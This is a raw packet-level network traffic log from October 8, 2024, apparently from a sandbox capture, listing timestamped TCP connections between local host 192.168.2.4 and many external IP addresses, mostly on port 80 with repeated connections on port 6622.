                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.204468012 CEST5018380192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.209912062 CEST805018372.52.178.23192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.209924936 CEST805018372.52.178.23192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.381036043 CEST805017918.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.381072044 CEST805017918.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.381123066 CEST5017980192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.381373882 CEST5017980192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.386908054 CEST805017918.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.527846098 CEST5018480192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.532834053 CEST805018434.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.533335924 CEST5018480192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.534482956 CEST5018480192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.534482956 CEST5018480192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.539307117 CEST805018434.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.539493084 CEST805018434.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.732907057 CEST805018372.52.178.23192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.733243942 CEST5018380192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.734004021 CEST5018380192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.738979101 CEST805018372.52.178.23192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.782572031 CEST5018580192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.787576914 CEST805018544.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.788566113 CEST5018580192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.791023016 CEST5018580192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.791167021 CEST5018580192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.796391010 CEST805018544.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.797045946 CEST805018544.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:42.109249115 CEST662250181204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:42.113325119 CEST501816622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:42.113325119 CEST501816622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:42.118386030 CEST662250181204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:42.267083883 CEST805018544.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:42.267460108 CEST805018544.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:42.267574072 CEST5018580192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.109338999 CEST80501933.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.110343933 CEST5019380192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.110486031 CEST5019380192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.110486031 CEST5019380192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.116991997 CEST80501933.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.117027998 CEST80501933.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.393193960 CEST8050191172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.394009113 CEST5019180192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.394009113 CEST5019180192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.399171114 CEST8050191172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.411073923 CEST5019480192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.416342020 CEST805019454.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.418668032 CEST5019480192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.418838978 CEST5019480192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.418860912 CEST5019480192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.424196959 CEST805019454.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.424545050 CEST805019454.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.595979929 CEST80501933.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.596321106 CEST5019380192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.600339890 CEST80501933.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.600404978 CEST5019380192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.601412058 CEST80501933.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.145565033 CEST805019454.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.145760059 CEST805019454.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.146349907 CEST5019480192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.369951010 CEST5019480192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.374759912 CEST805019454.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.426489115 CEST5016380192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.426547050 CEST5006380192.168.2.485.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.431332111 CEST5019580192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.431699991 CEST8050163208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.431762934 CEST5016380192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.432379007 CEST805006385.214.228.140192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.432442904 CEST5006380192.168.2.485.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.436436892 CEST805019544.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.436584949 CEST5019580192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.436911106 CEST5019580192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.436966896 CEST5019580192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.441807032 CEST805019544.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.441865921 CEST805019544.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.492223024 CEST662250192204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.494672060 CEST501926622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.494712114 CEST501926622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.499876022 CEST662250192204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.528292894 CEST5019680192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.533371925 CEST805019635.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.533442974 CEST5019680192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.534096003 CEST5019680192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.534111023 CEST5019680192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.539124966 CEST805019635.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.539135933 CEST805019635.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:47.050497055 CEST805019544.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:47.050640106 CEST805019544.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:47.050646067 CEST805019544.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:47.050702095 CEST5019580192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:47.061795950 CEST5019580192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:47.066843033 CEST805019544.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.662951946 CEST5020280192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.668118954 CEST805020234.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.668752909 CEST5020280192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.669018030 CEST5020280192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.669050932 CEST5020280192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.674063921 CEST805020234.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.674082994 CEST805020234.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.799021006 CEST5020380192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.805629969 CEST8050203208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.805845976 CEST5020380192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.806413889 CEST5020380192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.806716919 CEST5020380192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.812340975 CEST8050203208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.812685013 CEST8050203208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:50.310046911 CEST8050203208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:50.404738903 CEST5020380192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:50.404778957 CEST5020380192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:50.409836054 CEST8050203208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:50.409962893 CEST8050203208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:50.441169977 CEST805020234.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:50.441565037 CEST805020234.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:50.441606045 CEST5020280192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:50.468413115 CEST5020280192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:50.473507881 CEST805020234.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:50.522634029 CEST8050203208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:50.551539898 CEST5020480192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:50.557569981 CEST805020444.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:50.560678959 CEST5020480192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:50.560887098 CEST5020480192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:50.560913086 CEST5020480192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:50.565790892 CEST805020444.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:50.565818071 CEST805020444.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:50.598274946 CEST5020380192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:51.063618898 CEST805020444.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:51.064307928 CEST805020444.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:51.064614058 CEST5020480192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:51.135324001 CEST662250201204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:51.137660027 CEST502016622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:51.138453960 CEST502016622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:51.143704891 CEST662250201204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:51.836303949 CEST502056622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:51.887255907 CEST662250205204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:51.888444901 CEST502056622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:52.064304113 CEST502056622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:52.070204020 CEST662250205204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:52.477566004 CEST5020480192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:52.482986927 CEST805020444.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:52.551757097 CEST5020680192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:52.556725979 CEST805020647.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:52.556793928 CEST5020680192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:52.558598995 CEST5020780192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:52.559083939 CEST5020680192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:52.559112072 CEST5020680192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:52.564115047 CEST805020744.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:52.564129114 CEST805020647.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:52.564140081 CEST805020647.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:52.564614058 CEST5020780192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.880486965 CEST805021318.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.881237984 CEST805021318.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.882519960 CEST5021380192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.894576073 CEST5021380192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.899756908 CEST805021318.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.956432104 CEST5021480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.962956905 CEST805021444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.965611935 CEST5021480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.972193003 CEST5021480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.972225904 CEST5021480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.977370977 CEST805021444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.977557898 CEST805021444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:56.063169956 CEST502156622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:56.068408966 CEST662250215204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:56.068516016 CEST502156622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:56.073571920 CEST502156622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:56.079401016 CEST662250215204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:56.317397118 CEST80502123.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:56.317620039 CEST80502123.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:56.317682028 CEST5021280192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:56.326946020 CEST5021280192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:56.331913948 CEST80502123.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:56.425350904 CEST805021444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:56.427122116 CEST805021444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:56.427201033 CEST5021480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:56.478846073 CEST5021480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:56.484122992 CEST805021444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:57.028336048 CEST5021680192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:57.198111057 CEST805021618.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:57.198237896 CEST5021680192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:57.201081038 CEST5021680192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:57.201081038 CEST5021680192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:57.206219912 CEST805021618.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:57.206456900 CEST805021618.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:57.270473957 CEST5021780192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:57.275646925 CEST805021754.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:57.275724888 CEST5021780192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:57.278965950 CEST5021780192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:57.278985977 CEST5021780192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:57.284296989 CEST805021754.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:57.284689903 CEST805021754.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:57.548922062 CEST662250215204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:57.548989058 CEST502156622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:57.549045086 CEST502156622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:57.554457903 CEST662250215204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:58.009445906 CEST805021754.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:58.009666920 CEST5021780192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:58.009875059 CEST805021754.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:58.009937048 CEST5021780192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:58.015559912 CEST805021754.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:58.114746094 CEST502186622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:58.119738102 CEST662250218204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:58.119860888 CEST502186622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:58.123945951 CEST502186622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:58.128792048 CEST662250218204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:58.377000093 CEST5021980192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:58.382852077 CEST805021954.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:01.703541040 CEST662250221204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.013509035 CEST805022572.52.178.23192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.014714003 CEST5022580192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.051377058 CEST805022347.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.051455975 CEST805022347.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.053347111 CEST5022380192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.060718060 CEST5022580192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.067496061 CEST805022572.52.178.23192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.231250048 CEST502266622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.231508017 CEST5022380192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.237140894 CEST662250226204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.237535000 CEST805022347.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.237622976 CEST502266622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.241349936 CEST502266622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.246637106 CEST662250226204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.279010057 CEST5022780192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.284225941 CEST805022772.52.178.23192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.284347057 CEST5022780192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.318603039 CEST5022780192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.318914890 CEST5022780192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.323676109 CEST805022772.52.178.23192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.323878050 CEST805022772.52.178.23192.168.2.4
